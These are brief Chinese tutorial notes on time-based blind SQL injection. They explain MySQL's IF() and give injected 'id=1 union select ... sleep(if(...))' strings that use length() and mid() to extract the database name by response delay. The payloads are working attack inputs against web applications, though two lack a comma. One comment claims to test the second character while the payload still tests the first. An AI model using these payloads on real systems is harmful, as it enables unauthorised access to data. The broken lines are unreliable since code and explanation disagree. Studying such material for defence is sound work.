sleep盲注攻击
Sleep延迟:延迟盲注
If(条件,true,false):
条件成立,返回第二个参数,反之第三个参数
举例1:length
id=1 union select 1,2,sleep(if(length(database())=5,5,0))
如果(database())=5 条件成立,返回5,不成立返回0
举例2:获取数据库名 mid
id=1 union select 1,2sleep(if(mid(database(),1,1)='s',5,0))
第一位为s则会休眠5秒
id=1 union select 1,2sleep(if(mid(database(),1,1)='q',5,0))
第二位为q则会休眠5秒
不用order by 情况下
